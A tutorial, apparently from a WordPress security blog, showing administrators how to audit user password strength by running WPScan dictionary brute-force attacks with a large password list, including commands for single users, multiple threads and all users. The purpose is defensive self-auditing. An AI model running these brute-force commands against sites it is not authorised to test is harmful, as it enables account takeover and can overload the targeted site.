As a WordPress site administrator you are responsible for your site’s security. Most probably you have already done a lot to beef up WordPress security, but what about the users? Are they all using a strong password? Typically users are not fond of strong passwords, and the only way you can really ensure they use strong passwords is by enforcing WordPress password policies.
Even if you use a plugin to enforce strong user passwords on your site, it is still recommended to do the occasional check and scan your site for weak passwords. It is like launching a controlled brute force attack against your WordPress site. This article explains how to use the free WPScan tool to do such a scan.
WordPress Users Password Dictionary
To launch a password strength test with the WPScan tool you need a good password dictionary. WP White Security.com has a WordPress user password dictionary which contains one million commonly used passwords. Download the WordPress Password Dictionary to use it in your WordPress password security audits.
Checking the Password Strength of a Single User with WPScan
If you already know the username use the below command to check the strength the WordPress password with WPScan WordPress Security Scanner:
ruby wpscan –url www.local.com –wordlist wpw_pwd_dictionary.txt –username admin
The above WPScan command and arguments are explained below:
–url: This argument is used to specify the URL of the target WordPress site. In this example we launched a password brute force attack against www.local.com.
–wordlist: Use this to specify the name of the password dictionary file. In this example the name of the password dictionary is wpw_pwd_dictionary.txt. There is no need to specify a directory path if the password dictionary is in the same directory of the WPScan scanner.
–username: Use this to specify the WordPress username. In our example the password brute force attack was launched against the admin account.
The below screenshot shows the output of the WPScan tool, when starting the password brute force attack against the admin WordPress user. It also show the result of the scan, which shows that the admin account was using the password adminpass.
A WPScan WordPress password brute force attack might be a little bit slow, especially if you are using a large password dictionary file like ours. To speed up the process you can configure WPScan to use multiple threads by using the –threads argument. In the below example we launch a password brute force attack with WPScan using 50 threads.
ruby wpscan –url www.local.com –wordlist wpw_pwd_dictionary.txt –username admin –threads 50
WP White Security.com Webmaster Tip: By using multiple threads you increase the load on your website, which might disrupt its operation. Be careful.
Password Strength Test of Multiple WordPress Users with WPScan
To check the password strength of multiple or all of the WordPress users with the WPScan WordPress Security Scanner, use the same commands used in the previous examples but without the –username argument. Example follows:
ruby wpscan.rb www.local.com –wordlist wpw_pwd_dictionary.txt
If the target WordPress site has a large number of users the password brute force attack / password strength check might take a very long time and might affect the performance of the website or blog. In such case, it is recommended to first enumerate the WordPress users with WPScan and then choose the users of whom you would like to check the strength of their passwords.